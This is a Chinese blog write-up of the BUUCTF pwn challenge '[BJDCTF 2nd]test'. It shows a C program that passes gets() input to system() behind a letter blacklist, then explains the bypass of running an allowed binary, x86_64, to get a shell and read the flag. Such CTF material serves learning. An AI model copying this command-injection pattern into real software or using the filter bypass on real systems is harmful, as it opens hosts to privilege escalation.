CTF-Pwn-[BJDCTF 2nd]test

CTF-Pwn-[BJDCTF 2nd]test

博客说明

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

CTP平台

网址

https://buuoj.cn/challenges

题目

Pwn类,[BJDCTF 2nd]test

CTF-Pwn-[BJDCTF 2nd]test_第1张图片

这个题目需要使用ssh连接

Username: ctf Password: test

思路

远程连接
ssh -p 25431 [email protected]

CTF-Pwn-[BJDCTF 2nd]test_第2张图片

查看文件

CTF-Pwn-[BJDCTF 2nd]test_第3张图片

发现没有权限查看flag,那么我们要做的就是使用test.c文件来提升权限啦

#include 
#include 
#include 

int main(){
    char cmd[0x100] = {0};
    puts("Welcome to Pwn-Game by TaQini.");
    puts("Your ID:");
    system("id");
    printf("$ ");
    gets(cmd);
    if( strstr(cmd, "n")
       ||strstr(cmd, "e")
       ||strstr(cmd, "p")
       ||strstr(cmd, "b")
       ||strstr(cmd, "u")
       ||strstr(cmd, "s")
       ||strstr(cmd, "h")
       ||strstr(cmd, "i")
       ||strstr(cmd, "f")
       ||strstr(cmd, "l")
       ||strstr(cmd, "a")
       ||strstr(cmd, "g")
       ||strstr(cmd, "|")
       ||strstr(cmd, "/")
       ||strstr(cmd, "$")
       ||strstr(cmd, "`")
       ||strstr(cmd, "-")
       ||strstr(cmd, "<")
       ||strstr(cmd, ">")
       ||strstr(cmd, ".")){
        exit(0);    
    }else{
        system(cmd);
    }
    return 0;
}

题目大概的意思是运行test,输入一个命令,这个时候的权限可以读取flag

test.c过滤了很多命令,取下的过滤规则是 "n|e|p|b|u|s|h|i|f|l|a|g",查看剩下可以使用的命令

ls /usr/bin/ /bin/ | grep -v -E "n|e|p|b|u|s|h|i|f|l|a|g"

CTF-Pwn-[BJDCTF 2nd]test_第4张图片

测试

执行test,输入x86_64,然后cat flag

CTF-Pwn-[BJDCTF 2nd]test_第5张图片

flag就找到了

感谢

BUUCTF

以及勤劳的自己

你可能感兴趣的:(CTF-Pwn-[BJDCTF 2nd]test)